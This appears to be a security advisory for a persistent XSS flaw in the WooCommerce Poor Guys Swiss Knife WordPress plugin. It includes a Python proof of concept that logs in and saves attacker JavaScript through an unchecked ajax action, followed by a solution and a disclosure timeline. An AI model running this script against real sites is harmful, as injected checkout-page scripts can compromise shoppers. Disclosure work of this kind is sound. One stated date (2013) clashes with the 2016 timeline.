WooCommerce Poor Guys Swiss Knife [Persistent XSS]

WooCommerce Poor Guys Swiss Knife plugin for WordPress suffers from a Persistent XSS vulnerability

Description

WooCommerce Poor Guys Swiss Knife plugin for WordPress suffers from a Persistent XSS vulnerability. Plugin registers a wp_ajax action in order to save JS code to be included in checkout page. The plugin doesn’t check for appropriate user capabilities before saving the submitted JS code, so any registered user can call this action. After the JS code is saved it will be displayed to any user that visits the checkout page.

The attacker must have a valid user account to exploit this vulnerability but as this plugin is a WooCommerce enhancement and WooCommerce will have user registration open in most cases, acquiring a valid account should be trivial.

PoC

#!/usr/bin/python3

################################################################################
# WooCommerce Poor Guys Swiss Knife - Persistent XSS Exploit
#
# Author: Pan Vag
# Site: http://local-cluster.com
################################################################################

import requests

baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
ajaxUrl = baseUrl + '/wp-admin/admin-ajax.php'

loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}

s = requests.Session()

r = s.post(loginUrl, loginPostData)

if r.status_code != 200:
    print('Login error')
    exit(1)

data = {
    'action': 'wcpgsk_save_checkoutjs',
    'checkoutjs': 'alert("XSS")'
}

r = s.post(ajaxUrl, data)

if r.text == 'js saved':
    print('Success')
else:
    print('Error')

exit(0)

Solution

As of March 2013 plugin author has taken down plugin home page. Plugin author never responded in our attempts to come in contact, so the only thing to assume is that this plugin is discontinued.

The only available solution is to remove this plugin from affected websites.

---

WordPress Plugins Persistent XSS

---

INFO

• 13 February 2016
• Pan Vag
• www.takebarcelona.com
• wordpress.org
• 2.2.4
• WordPress 4.4.2
• DWF-2016-87001

TIMELINE

• 2016-02-13:
  Requested CVE ID
• 2016-02-14:
  Vendor notified through wordpress.org support forums
• 2016-02-25:
  No response from the author. Notified wordpress.org security team about this issue
• 2016-02-27:
  Plugin taken down from wordpress.org plugins team
• 2016-03-10:
  Plugin webpage taken down